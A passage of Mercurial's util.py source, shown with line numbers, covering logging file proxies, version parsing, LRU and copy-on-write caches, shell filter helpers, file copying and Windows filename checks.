706 706 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
707 707 self.fh = fh
708 708 self.name = name
709 709 self.logdata = logdata
710 710 self.reads = reads
711 711 self.writes = writes
712 712
713 713 def _writedata(self, data):
714 714 if not self.logdata:
715 715 self.fh.write('\n')
716 716 return
717 717
718 718 # Simple case writes all data on a single line.
719 719 if b'\n' not in data:
720 720 self.fh.write(': %s\n' % escapedata(data))
721 721 return
722 722
723 723 # Data with newlines is written to multiple lines.
724 724 self.fh.write(':\n')
725 725 lines = data.splitlines(True)
726 726 for line in lines:
727 727 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
728 728
729 729 def read(self, res, size=-1):
730 730 if not self.reads:
731 731 return
732 732 # Python 3 can return None from reads at EOF instead of empty strings.
733 733 if res is None:
734 734 res = ''
735 735
736 736 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
737 737 self._writedata(res)
738 738
739 739 def readline(self, res, limit=-1):
740 740 if not self.reads:
741 741 return
742 742
743 743 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
744 744 self._writedata(res)
745 745
746 746 def readinto(self, res, dest):
747 747 if not self.reads:
748 748 return
749 749
750 750 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
751 751 res))
752 752 data = dest[0:res] if res is not None else b''
753 753 self._writedata(data)
754 754
755 755 def write(self, res, data):
756 756 if not self.writes:
757 757 return
758 758
759 759 # Python 2 returns None from some write() calls. Python 3 (reasonably)
760 760 # returns the integer bytes written.
761 761 if res is None and data:
762 762 res = len(data)
763 763
764 764 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
765 765 self._writedata(data)
766 766
767 767 def flush(self, res):
768 768 if not self.writes:
769 769 return
770 770
771 771 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
772 772
773 773 # For observedbufferedinputpipe.
774 774 def bufferedread(self, res, size):
775 775 self.fh.write('%s> bufferedread(%d) -> %d' % (
776 776 self.name, size, len(res)))
777 777 self._writedata(res)
778 778
779 779 def bufferedreadline(self, res):
780 780 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
781 781 self._writedata(res)
782 782
783 783 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
784 784 logdata=False):
785 785 """Turn a file object into a logging file object."""
786 786
787 787 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
788 788 logdata=logdata)
789 789 return fileobjectproxy(fh, observer)
790 790
791 791 def version():
792 792 """Return version information if available."""
793 793 try:
794 794 from . import __version__
795 795 return __version__.version
796 796 except ImportError:
797 797 return 'unknown'
798 798
799 799 def versiontuple(v=None, n=4):
800 800 """Parses a Mercurial version string into an N-tuple.
801 801
802 802 The version string to be parsed is specified with the ``v`` argument.
803 803 If it isn't defined, the current Mercurial version string will be parsed.
804 804
805 805 ``n`` can be 2, 3, or 4. Here is how some version strings map to
806 806 returned values:
807 807
808 808 >>> v = b'3.6.1+190-df9b73d2d444'
809 809 >>> versiontuple(v, 2)
810 810 (3, 6)
811 811 >>> versiontuple(v, 3)
812 812 (3, 6, 1)
813 813 >>> versiontuple(v, 4)
814 814 (3, 6, 1, '190-df9b73d2d444')
815 815
816 816 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
817 817 (3, 6, 1, '190-df9b73d2d444+20151118')
818 818
819 819 >>> v = b'3.6'
820 820 >>> versiontuple(v, 2)
821 821 (3, 6)
822 822 >>> versiontuple(v, 3)
823 823 (3, 6, None)
824 824 >>> versiontuple(v, 4)
825 825 (3, 6, None, None)
826 826
827 827 >>> v = b'3.9-rc'
828 828 >>> versiontuple(v, 2)
829 829 (3, 9)
830 830 >>> versiontuple(v, 3)
831 831 (3, 9, None)
832 832 >>> versiontuple(v, 4)
833 833 (3, 9, None, 'rc')
834 834
835 835 >>> v = b'3.9-rc+2-02a8fea4289b'
836 836 >>> versiontuple(v, 2)
837 837 (3, 9)
838 838 >>> versiontuple(v, 3)
839 839 (3, 9, None)
840 840 >>> versiontuple(v, 4)
841 841 (3, 9, None, 'rc+2-02a8fea4289b')
842 842 """
843 843 if not v:
844 844 v = version()
845 845 parts = remod.split('[\+-]', v, 1)
846 846 if len(parts) == 1:
847 847 vparts, extra = parts[0], None
848 848 else:
849 849 vparts, extra = parts
850 850
851 851 vints = []
852 852 for i in vparts.split('.'):
853 853 try:
854 854 vints.append(int(i))
855 855 except ValueError:
856 856 break
857 857 # (3, 6) -> (3, 6, None)
858 858 while len(vints) < 3:
859 859 vints.append(None)
860 860
861 861 if n == 2:
862 862 return (vints[0], vints[1])
863 863 if n == 3:
864 864 return (vints[0], vints[1], vints[2])
865 865 if n == 4:
866 866 return (vints[0], vints[1], vints[2], extra)
867 867
868 868 def cachefunc(func):
869 869 '''cache the result of function calls'''
870 870 # XXX doesn't handle keywords args
871 871 if func.__code__.co_argcount == 0:
872 872 cache = []
873 873 def f():
874 874 if len(cache) == 0:
875 875 cache.append(func())
876 876 return cache[0]
877 877 return f
878 878 cache = {}
879 879 if func.__code__.co_argcount == 1:
880 880 # we gain a small amount of time because
881 881 # we don't need to pack/unpack the list
882 882 def f(arg):
883 883 if arg not in cache:
884 884 cache[arg] = func(arg)
885 885 return cache[arg]
886 886 else:
887 887 def f(*args):
888 888 if args not in cache:
889 889 cache[args] = func(*args)
890 890 return cache[args]
891 891
892 892 return f
893 893
894 894 class cow(object):
895 895 """helper class to make copy-on-write easier
896 896
897 897 Call preparewrite before doing any writes.
898 898 """
899 899
900 900 def preparewrite(self):
901 901 """call this before writes, return self or a copied new object"""
902 902 if getattr(self, '_copied', 0):
903 903 self._copied -= 1
904 904 return self.__class__(self)
905 905 return self
906 906
907 907 def copy(self):
908 908 """always do a cheap copy"""
909 909 self._copied = getattr(self, '_copied', 0) + 1
910 910 return self
911 911
912 912 class sortdict(collections.OrderedDict):
913 913 '''a simple sorted dictionary
914 914
915 915 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
916 916 >>> d2 = d1.copy()
917 917 >>> d2
918 918 sortdict([('a', 0), ('b', 1)])
919 919 >>> d2.update([(b'a', 2)])
920 920 >>> list(d2.keys()) # should still be in last-set order
921 921 ['b', 'a']
922 922 '''
923 923
924 924 def __setitem__(self, key, value):
925 925 if key in self:
926 926 del self[key]
927 927 super(sortdict, self).__setitem__(key, value)
928 928
929 929 if pycompat.ispypy:
930 930 # __setitem__() isn't called as of PyPy 5.8.0
931 931 def update(self, src):
932 932 if isinstance(src, dict):
933 933 src = src.iteritems()
934 934 for k, v in src:
935 935 self[k] = v
936 936
937 937 class cowdict(cow, dict):
938 938 """copy-on-write dict
939 939
940 940 Be sure to call d = d.preparewrite() before writing to d.
941 941
942 942 >>> a = cowdict()
943 943 >>> a is a.preparewrite()
944 944 True
945 945 >>> b = a.copy()
946 946 >>> b is a
947 947 True
948 948 >>> c = b.copy()
949 949 >>> c is a
950 950 True
951 951 >>> a = a.preparewrite()
952 952 >>> b is a
953 953 False
954 954 >>> a is a.preparewrite()
955 955 True
956 956 >>> c = c.preparewrite()
957 957 >>> b is c
958 958 False
959 959 >>> b is b.preparewrite()
960 960 True
961 961 """
962 962
963 963 class cowsortdict(cow, sortdict):
964 964 """copy-on-write sortdict
965 965
966 966 Be sure to call d = d.preparewrite() before writing to d.
967 967 """
968 968
969 969 class transactional(object):
970 970 """Base class for making a transactional type into a context manager."""
971 971 __metaclass__ = abc.ABCMeta
972 972
973 973 @abc.abstractmethod
974 974 def close(self):
975 975 """Successfully closes the transaction."""
976 976
977 977 @abc.abstractmethod
978 978 def release(self):
979 979 """Marks the end of the transaction.
980 980
981 981 If the transaction has not been closed, it will be aborted.
982 982 """
983 983
984 984 def __enter__(self):
985 985 return self
986 986
987 987 def __exit__(self, exc_type, exc_val, exc_tb):
988 988 try:
989 989 if exc_type is None:
990 990 self.close()
991 991 finally:
992 992 self.release()
993 993
994 994 @contextlib.contextmanager
995 995 def acceptintervention(tr=None):
996 996 """A context manager that closes the transaction on InterventionRequired
997 997
998 998 If no transaction was provided, this simply runs the body and returns
999 999 """
1000 1000 if not tr:
1001 1001 yield
1002 1002 return
1003 1003 try:
1004 1004 yield
1005 1005 tr.close()
1006 1006 except error.InterventionRequired:
1007 1007 tr.close()
1008 1008 raise
1009 1009 finally:
1010 1010 tr.release()
1011 1011
1012 1012 @contextlib.contextmanager
1013 1013 def nullcontextmanager():
1014 1014 yield
1015 1015
1016 1016 class _lrucachenode(object):
1017 1017 """A node in a doubly linked list.
1018 1018
1019 1019 Holds a reference to nodes on either side as well as a key-value
1020 1020 pair for the dictionary entry.
1021 1021 """
1022 1022 __slots__ = (u'next', u'prev', u'key', u'value')
1023 1023
1024 1024 def __init__(self):
1025 1025 self.next = None
1026 1026 self.prev = None
1027 1027
1028 1028 self.key = _notset
1029 1029 self.value = None
1030 1030
1031 1031 def markempty(self):
1032 1032 """Mark the node as emptied."""
1033 1033 self.key = _notset
1034 1034
1035 1035 class lrucachedict(object):
1036 1036 """Dict that caches most recent accesses and sets.
1037 1037
1038 1038 The dict consists of an actual backing dict - indexed by original
1039 1039 key - and a doubly linked circular list defining the order of entries in
1040 1040 the cache.
1041 1041
1042 1042 The head node is the newest entry in the cache. If the cache is full,
1043 1043 we recycle head.prev and make it the new head. Cache accesses result in
1044 1044 the node being moved to before the existing head and being marked as the
1045 1045 new head node.
1046 1046 """
1047 1047 def __init__(self, max):
1048 1048 self._cache = {}
1049 1049
1050 1050 self._head = head = _lrucachenode()
1051 1051 head.prev = head
1052 1052 head.next = head
1053 1053 self._size = 1
1054 1054 self._capacity = max
1055 1055
1056 1056 def __len__(self):
1057 1057 return len(self._cache)
1058 1058
1059 1059 def __contains__(self, k):
1060 1060 return k in self._cache
1061 1061
1062 1062 def __iter__(self):
1063 1063 # We don't have to iterate in cache order, but why not.
1064 1064 n = self._head
1065 1065 for i in range(len(self._cache)):
1066 1066 yield n.key
1067 1067 n = n.next
1068 1068
1069 1069 def __getitem__(self, k):
1070 1070 node = self._cache[k]
1071 1071 self._movetohead(node)
1072 1072 return node.value
1073 1073
1074 1074 def __setitem__(self, k, v):
1075 1075 node = self._cache.get(k)
1076 1076 # Replace existing value and mark as newest.
1077 1077 if node is not None:
1078 1078 node.value = v
1079 1079 self._movetohead(node)
1080 1080 return
1081 1081
1082 1082 if self._size < self._capacity:
1083 1083 node = self._addcapacity()
1084 1084 else:
1085 1085 # Grab the last/oldest item.
1086 1086 node = self._head.prev
1087 1087
1088 1088 # At capacity. Kill the old entry.
1089 1089 if node.key is not _notset:
1090 1090 del self._cache[node.key]
1091 1091
1092 1092 node.key = k
1093 1093 node.value = v
1094 1094 self._cache[k] = node
1095 1095 # And mark it as newest entry. No need to adjust order since it
1096 1096 # is already self._head.prev.
1097 1097 self._head = node
1098 1098
1099 1099 def __delitem__(self, k):
1100 1100 node = self._cache.pop(k)
1101 1101 node.markempty()
1102 1102
1103 1103 # Temporarily mark as newest item before re-adjusting head to make
1104 1104 # this node the oldest item.
1105 1105 self._movetohead(node)
1106 1106 self._head = node.next
1107 1107
1108 1108 # Additional dict methods.
1109 1109
1110 1110 def get(self, k, default=None):
1111 1111 try:
1112 1112 return self._cache[k].value
1113 1113 except KeyError:
1114 1114 return default
1115 1115
1116 1116 def clear(self):
1117 1117 n = self._head
1118 1118 while n.key is not _notset:
1119 1119 n.markempty()
1120 1120 n = n.next
1121 1121
1122 1122 self._cache.clear()
1123 1123
1124 1124 def copy(self):
1125 1125 result = lrucachedict(self._capacity)
1126 1126 n = self._head.prev
1127 1127 # Iterate in oldest-to-newest order, so the copy has the right ordering
1128 1128 for i in range(len(self._cache)):
1129 1129 result[n.key] = n.value
1130 1130 n = n.prev
1131 1131 return result
1132 1132
1133 1133 def _movetohead(self, node):
1134 1134 """Mark a node as the newest, making it the new head.
1135 1135
1136 1136 When a node is accessed, it becomes the freshest entry in the LRU
1137 1137 list, which is denoted by self._head.
1138 1138
1139 1139 Visually, let's make ``N`` the new head node (* denotes head):
1140 1140
1141 1141 previous/oldest <-> head <-> next/next newest
1142 1142
1143 1143 ----<->--- A* ---<->-----
1144 1144 | |
1145 1145 E <-> D <-> N <-> C <-> B
1146 1146
1147 1147 To:
1148 1148
1149 1149 ----<->--- N* ---<->-----
1150 1150 | |
1151 1151 E <-> D <-> C <-> B <-> A
1152 1152
1153 1153 This requires the following moves:
1154 1154
1155 1155 C.next = D (node.prev.next = node.next)
1156 1156 D.prev = C (node.next.prev = node.prev)
1157 1157 E.next = N (head.prev.next = node)
1158 1158 N.prev = E (node.prev = head.prev)
1159 1159 N.next = A (node.next = head)
1160 1160 A.prev = N (head.prev = node)
1161 1161 """
1162 1162 head = self._head
1163 1163 # C.next = D
1164 1164 node.prev.next = node.next
1165 1165 # D.prev = C
1166 1166 node.next.prev = node.prev
1167 1167 # N.prev = E
1168 1168 node.prev = head.prev
1169 1169 # N.next = A
1170 1170 # It is tempting to do just "head" here, however if node is
1171 1171 # adjacent to head, this will do bad things.
1172 1172 node.next = head.prev.next
1173 1173 # E.next = N
1174 1174 node.next.prev = node
1175 1175 # A.prev = N
1176 1176 node.prev.next = node
1177 1177
1178 1178 self._head = node
1179 1179
1180 1180 def _addcapacity(self):
1181 1181 """Add a node to the circular linked list.
1182 1182
1183 1183 The new node is inserted before the head node.
1184 1184 """
1185 1185 head = self._head
1186 1186 node = _lrucachenode()
1187 1187 head.prev.next = node
1188 1188 node.prev = head.prev
1189 1189 node.next = head
1190 1190 head.prev = node
1191 1191 self._size += 1
1192 1192 return node
1193 1193
1194 1194 def lrucachefunc(func):
1195 1195 '''cache most recent results of function calls'''
1196 1196 cache = {}
1197 1197 order = collections.deque()
1198 1198 if func.__code__.co_argcount == 1:
1199 1199 def f(arg):
1200 1200 if arg not in cache:
1201 1201 if len(cache) > 20:
1202 1202 del cache[order.popleft()]
1203 1203 cache[arg] = func(arg)
1204 1204 else:
1205 1205 order.remove(arg)
1206 1206 order.append(arg)
1207 1207 return cache[arg]
1208 1208 else:
1209 1209 def f(*args):
1210 1210 if args not in cache:
1211 1211 if len(cache) > 20:
1212 1212 del cache[order.popleft()]
1213 1213 cache[args] = func(*args)
1214 1214 else:
1215 1215 order.remove(args)
1216 1216 order.append(args)
1217 1217 return cache[args]
1218 1218
1219 1219 return f
1220 1220
1221 1221 class propertycache(object):
1222 1222 def __init__(self, func):
1223 1223 self.func = func
1224 1224 self.name = func.__name__
1225 1225 def __get__(self, obj, type=None):
1226 1226 result = self.func(obj)
1227 1227 self.cachevalue(obj, result)
1228 1228 return result
1229 1229
1230 1230 def cachevalue(self, obj, value):
1231 1231 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1232 1232 obj.__dict__[self.name] = value
1233 1233
1234 1234 def clearcachedproperty(obj, prop):
1235 1235 '''clear a cached property value, if one has been set'''
1236 1236 if prop in obj.__dict__:
1237 1237 del obj.__dict__[prop]
1238 1238
1239 1239 def pipefilter(s, cmd):
1240 1240 '''filter string S through command CMD, returning its output'''
1241 1241 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1242 1242 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1243 1243 pout, perr = p.communicate(s)
1244 1244 return pout
1245 1245
1246 1246 def tempfilter(s, cmd):
1247 1247 '''filter string S through a pair of temporary files with CMD.
1248 1248 CMD is used as a template to create the real command to be run,
1249 1249 with the strings INFILE and OUTFILE replaced by the real names of
1250 1250 the temporary files generated.'''
1251 1251 inname, outname = None, None
1252 1252 try:
1253 1253 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1254 1254 fp = os.fdopen(infd, r'wb')
1255 1255 fp.write(s)
1256 1256 fp.close()
1257 1257 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1258 1258 os.close(outfd)
1259 1259 cmd = cmd.replace('INFILE', inname)
1260 1260 cmd = cmd.replace('OUTFILE', outname)
1261 1261 code = os.system(cmd)
1262 1262 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1263 1263 code = 0
1264 1264 if code:
1265 1265 raise Abort(_("command '%s' failed: %s") %
1266 1266 (cmd, explainexit(code)))
1267 1267 return readfile(outname)
1268 1268 finally:
1269 1269 try:
1270 1270 if inname:
1271 1271 os.unlink(inname)
1272 1272 except OSError:
1273 1273 pass
1274 1274 try:
1275 1275 if outname:
1276 1276 os.unlink(outname)
1277 1277 except OSError:
1278 1278 pass
1279 1279
1280 1280 filtertable = {
1281 1281 'tempfile:': tempfilter,
1282 1282 'pipe:': pipefilter,
1283 1283 }
1284 1284
1285 1285 def filter(s, cmd):
1286 1286 "filter a string through a command that transforms its input to its output"
1287 1287 for name, fn in filtertable.iteritems():
1288 1288 if cmd.startswith(name):
1289 1289 return fn(s, cmd[len(name):].lstrip())
1290 1290 return pipefilter(s, cmd)
1291 1291
1292 1292 def binary(s):
1293 1293 """return true if a string is binary data"""
1294 1294 return bool(s and '\0' in s)
1295 1295
1296 1296 def increasingchunks(source, min=1024, max=65536):
1297 1297 '''return no less than min bytes per chunk while data remains,
1298 1298 doubling min after each chunk until it reaches max'''
1299 1299 def log2(x):
1300 1300 if not x:
1301 1301 return 0
1302 1302 i = 0
1303 1303 while x:
1304 1304 x >>= 1
1305 1305 i += 1
1306 1306 return i - 1
1307 1307
1308 1308 buf = []
1309 1309 blen = 0
1310 1310 for chunk in source:
1311 1311 buf.append(chunk)
1312 1312 blen += len(chunk)
1313 1313 if blen >= min:
1314 1314 if min < max:
1315 1315 min = min << 1
1316 1316 nmin = 1 << log2(blen)
1317 1317 if nmin > min:
1318 1318 min = nmin
1319 1319 if min > max:
1320 1320 min = max
1321 1321 yield ''.join(buf)
1322 1322 blen = 0
1323 1323 buf = []
1324 1324 if buf:
1325 1325 yield ''.join(buf)
1326 1326
1327 1327 Abort = error.Abort
1328 1328
1329 1329 def always(fn):
1330 1330 return True
1331 1331
1332 1332 def never(fn):
1333 1333 return False
1334 1334
1335 1335 def nogc(func):
1336 1336 """disable garbage collector
1337 1337
1338 1338 Python's garbage collector triggers a GC each time a certain number of
1339 1339 container objects (the number being defined by gc.get_threshold()) are
1340 1340 allocated even when marked not to be tracked by the collector. Tracking has
1341 1341 no effect on when GCs are triggered, only on what objects the GC looks
1342 1342 into. As a workaround, disable GC while building complex (huge)
1343 1343 containers.
1344 1344
1345 1345 This garbage collector issue have been fixed in 2.7. But it still affect
1346 1346 CPython's performance.
1347 1347 """
1348 1348 def wrapper(*args, **kwargs):
1349 1349 gcenabled = gc.isenabled()
1350 1350 gc.disable()
1351 1351 try:
1352 1352 return func(*args, **kwargs)
1353 1353 finally:
1354 1354 if gcenabled:
1355 1355 gc.enable()
1356 1356 return wrapper
1357 1357
1358 1358 if pycompat.ispypy:
1359 1359 # PyPy runs slower with gc disabled
1360 1360 nogc = lambda x: x
1361 1361
1362 1362 def pathto(root, n1, n2):
1363 1363 '''return the relative path from one place to another.
1364 1364 root should use os.sep to separate directories
1365 1365 n1 should use os.sep to separate directories
1366 1366 n2 should use "/" to separate directories
1367 1367 returns an os.sep-separated path.
1368 1368
1369 1369 If n1 is a relative path, it's assumed it's
1370 1370 relative to root.
1371 1371 n2 should always be relative to root.
1372 1372 '''
1373 1373 if not n1:
1374 1374 return localpath(n2)
1375 1375 if os.path.isabs(n1):
1376 1376 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1377 1377 return os.path.join(root, localpath(n2))
1378 1378 n2 = '/'.join((pconvert(root), n2))
1379 1379 a, b = splitpath(n1), n2.split('/')
1380 1380 a.reverse()
1381 1381 b.reverse()
1382 1382 while a and b and a[-1] == b[-1]:
1383 1383 a.pop()
1384 1384 b.pop()
1385 1385 b.reverse()
1386 1386 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1387 1387
1388 1388 def mainfrozen():
1389 1389 """return True if we are a frozen executable.
1390 1390
1391 1391 The code supports py2exe (most common, Windows only) and tools/freeze
1392 1392 (portable, not much used).
1393 1393 """
1394 1394 return (safehasattr(sys, "frozen") or # new py2exe
1395 1395 safehasattr(sys, "importers") or # old py2exe
1396 1396 imp.is_frozen(u"__main__")) # tools/freeze
1397 1397
1398 1398 # the location of data files matching the source code
1399 1399 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1400 1400 # executable version (py2exe) doesn't support __file__
1401 1401 datapath = os.path.dirname(pycompat.sysexecutable)
1402 1402 else:
1403 1403 datapath = os.path.dirname(pycompat.fsencode(__file__))
1404 1404
1405 1405 i18n.setdatapath(datapath)
1406 1406
1407 1407 _hgexecutable = None
1408 1408
1409 1409 def hgexecutable():
1410 1410 """return location of the 'hg' executable.
1411 1411
1412 1412 Defaults to $HG or 'hg' in the search path.
1413 1413 """
1414 1414 if _hgexecutable is None:
1415 1415 hg = encoding.environ.get('HG')
1416 1416 mainmod = sys.modules[r'__main__']
1417 1417 if hg:
1418 1418 _sethgexecutable(hg)
1419 1419 elif mainfrozen():
1420 1420 if getattr(sys, 'frozen', None) == 'macosx_app':
1421 1421 # Env variable set by py2app
1422 1422 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1423 1423 else:
1424 1424 _sethgexecutable(pycompat.sysexecutable)
1425 1425 elif (os.path.basename(
1426 1426 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1427 1427 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1428 1428 else:
1429 1429 exe = findexe('hg') or os.path.basename(sys.argv[0])
1430 1430 _sethgexecutable(exe)
1431 1431 return _hgexecutable
1432 1432
1433 1433 def _sethgexecutable(path):
1434 1434 """set location of the 'hg' executable"""
1435 1435 global _hgexecutable
1436 1436 _hgexecutable = path
1437 1437
1438 1438 def _testfileno(f, stdf):
1439 1439 fileno = getattr(f, 'fileno', None)
1440 1440 try:
1441 1441 return fileno and fileno() == stdf.fileno()
1442 1442 except io.UnsupportedOperation:
1443 1443 return False # fileno() raised UnsupportedOperation
1444 1444
1445 1445 def isstdin(f):
1446 1446 return _testfileno(f, sys.__stdin__)
1447 1447
1448 1448 def isstdout(f):
1449 1449 return _testfileno(f, sys.__stdout__)
1450 1450
1451 1451 def shellenviron(environ=None):
1452 1452 """return environ with optional override, useful for shelling out"""
1453 1453 def py2shell(val):
1454 1454 'convert python object into string that is useful to shell'
1455 1455 if val is None or val is False:
1456 1456 return '0'
1457 1457 if val is True:
1458 1458 return '1'
1459 1459 return pycompat.bytestr(val)
1460 1460 env = dict(encoding.environ)
1461 1461 if environ:
1462 1462 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1463 1463 env['HG'] = hgexecutable()
1464 1464 return env
1465 1465
1466 1466 def system(cmd, environ=None, cwd=None, out=None):
1467 1467 '''enhanced shell command execution.
1468 1468 run with environment maybe modified, maybe in different dir.
1469 1469
1470 1470 if out is specified, it is assumed to be a file-like object that has a
1471 1471 write() method. stdout and stderr will be redirected to out.'''
1472 1472 try:
1473 1473 stdout.flush()
1474 1474 except Exception:
1475 1475 pass
1476 1476 cmd = quotecommand(cmd)
1477 1477 env = shellenviron(environ)
1478 1478 if out is None or isstdout(out):
1479 1479 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1480 1480 env=env, cwd=cwd)
1481 1481 else:
1482 1482 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1483 1483 env=env, cwd=cwd, stdout=subprocess.PIPE,
1484 1484 stderr=subprocess.STDOUT)
1485 1485 for line in iter(proc.stdout.readline, ''):
1486 1486 out.write(line)
1487 1487 proc.wait()
1488 1488 rc = proc.returncode
1489 1489 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1490 1490 rc = 0
1491 1491 return rc
1492 1492
1493 1493 def checksignature(func):
1494 1494 '''wrap a function with code to check for calling errors'''
1495 1495 def check(*args, **kwargs):
1496 1496 try:
1497 1497 return func(*args, **kwargs)
1498 1498 except TypeError:
1499 1499 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1500 1500 raise error.SignatureError
1501 1501 raise
1502 1502
1503 1503 return check
1504 1504
1505 1505 # a whilelist of known filesystems where hardlink works reliably
1506 1506 _hardlinkfswhitelist = {
1507 1507 'btrfs',
1508 1508 'ext2',
1509 1509 'ext3',
1510 1510 'ext4',
1511 1511 'hfs',
1512 1512 'jfs',
1513 1513 'NTFS',
1514 1514 'reiserfs',
1515 1515 'tmpfs',
1516 1516 'ufs',
1517 1517 'xfs',
1518 1518 'zfs',
1519 1519 }
1520 1520
1521 1521 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1522 1522 '''copy a file, preserving mode and optionally other stat info like
1523 1523 atime/mtime
1524 1524
1525 1525 checkambig argument is used with filestat, and is useful only if
1526 1526 destination file is guarded by any lock (e.g. repo.lock or
1527 1527 repo.wlock).
1528 1528
1529 1529 copystat and checkambig should be exclusive.
1530 1530 '''
1531 1531 assert not (copystat and checkambig)
1532 1532 oldstat = None
1533 1533 if os.path.lexists(dest):
1534 1534 if checkambig:
1535 1535 oldstat = checkambig and filestat.frompath(dest)
1536 1536 unlink(dest)
1537 1537 if hardlink:
1538 1538 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1539 1539 # unless we are confident that dest is on a whitelisted filesystem.
1540 1540 try:
1541 1541 fstype = getfstype(os.path.dirname(dest))
1542 1542 except OSError:
1543 1543 fstype = None
1544 1544 if fstype not in _hardlinkfswhitelist:
1545 1545 hardlink = False
1546 1546 if hardlink:
1547 1547 try:
1548 1548 oslink(src, dest)
1549 1549 return
1550 1550 except (IOError, OSError):
1551 1551 pass # fall back to normal copy
1552 1552 if os.path.islink(src):
1553 1553 os.symlink(os.readlink(src), dest)
1554 1554 # copytime is ignored for symlinks, but in general copytime isn't needed
1555 1555 # for them anyway
1556 1556 else:
1557 1557 try:
1558 1558 shutil.copyfile(src, dest)
1559 1559 if copystat:
1560 1560 # copystat also copies mode
1561 1561 shutil.copystat(src, dest)
1562 1562 else:
1563 1563 shutil.copymode(src, dest)
1564 1564 if oldstat and oldstat.stat:
1565 1565 newstat = filestat.frompath(dest)
1566 1566 if newstat.isambig(oldstat):
1567 1567 # stat of copied file is ambiguous to original one
1568 1568 advanced = (
1569 1569 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1570 1570 os.utime(dest, (advanced, advanced))
1571 1571 except shutil.Error as inst:
1572 1572 raise Abort(str(inst))
1573 1573
1574 1574 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1575 1575 """Copy a directory tree using hardlinks if possible."""
1576 1576 num = 0
1577 1577
1578 1578 gettopic = lambda: hardlink and _('linking') or _('copying')
1579 1579
1580 1580 if os.path.isdir(src):
1581 1581 if hardlink is None:
1582 1582 hardlink = (os.stat(src).st_dev ==
1583 1583 os.stat(os.path.dirname(dst)).st_dev)
1584 1584 topic = gettopic()
1585 1585 os.mkdir(dst)
1586 1586 for name, kind in listdir(src):
1587 1587 srcname = os.path.join(src, name)
1588 1588 dstname = os.path.join(dst, name)
1589 1589 def nprog(t, pos):
1590 1590 if pos is not None:
1591 1591 return progress(t, pos + num)
1592 1592 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1593 1593 num += n
1594 1594 else:
1595 1595 if hardlink is None:
1596 1596 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1597 1597 os.stat(os.path.dirname(dst)).st_dev)
1598 1598 topic = gettopic()
1599 1599
1600 1600 if hardlink:
1601 1601 try:
1602 1602 oslink(src, dst)
1603 1603 except (IOError, OSError):
1604 1604 hardlink = False
1605 1605 shutil.copy(src, dst)
1606 1606 else:
1607 1607 shutil.copy(src, dst)
1608 1608 num += 1
1609 1609 progress(topic, num)
1610 1610 progress(topic, None)
1611 1611
1612 1612 return hardlink, num
1613 1613
1614 1614 _winreservednames = {
1615 1615 'con', 'prn', 'aux', 'nul',
1616 1616 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1617 1617 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1618 1618 }
1619 1619 _winreservedchars = ':*?"<>|'
1620 1620 def checkwinfilename(path):
1621 1621 r'''Check that the base-relative path is a valid filename on Windows.
1622 1622 Returns None if the path is ok, or a UI string describing the problem.
1623 1623
1624 1624 >>> checkwinfilename(b"just/a/normal/path")
1625 1625 >>> checkwinfilename(b"foo/bar/con.xml")
1626 1626 "filename contains 'con', which is reserved on Windows"
1627 1627 >>> checkwinfilename(b"foo/con.xml/bar")
1628 1628 "filename contains 'con', which is reserved on Windows"
1629 1629 >>> checkwinfilename(b"foo/bar/xml.con")
1630 1630 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1631 1631 "filename contains 'AUX', which is reserved on Windows"
1632 1632 >>> checkwinfilename(b"foo/bar/bla:.txt")
1633 1633 "filename contains ':', which is reserved on Windows"
1634 1634 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1635 1635 "filename contains '\\x07', which is invalid on Windows"
1636 1636 >>> checkwinfilename(b"foo/bar/bla ")
1637 1637 "filename ends with ' ', which is not allowed on Windows"
1638 1638 >>> checkwinfilename(b"../bar")
1639 1639 >>> checkwinfilename(b"foo\\")
1640 1640 "filename ends with '\\', which is invalid on Windows"
1641 1641 >>> checkwinfilename(b"foo\\/bar")
1642 1642 "directory name ends with '\\', which is invalid on Windows"
1643 1643 '''
1644 1644 if path.endswith('\\'):
1645 1645 return _("filename ends with '\\', which is invalid on Windows")
1646 1646 if '\\/' in path:
1647 1647 return _("directory name ends with '\\', which is invalid on Windows")
1648 1648 for n in path.replace('\\', '/').split('/'):
1649 1649 if not n:
1650 1650 continue
1651 1651 for c in _filenamebytestr(n):
1652 1652 if c in _winreservedchars:
1653 1653 return _("filename contains '%s', which is reserved "
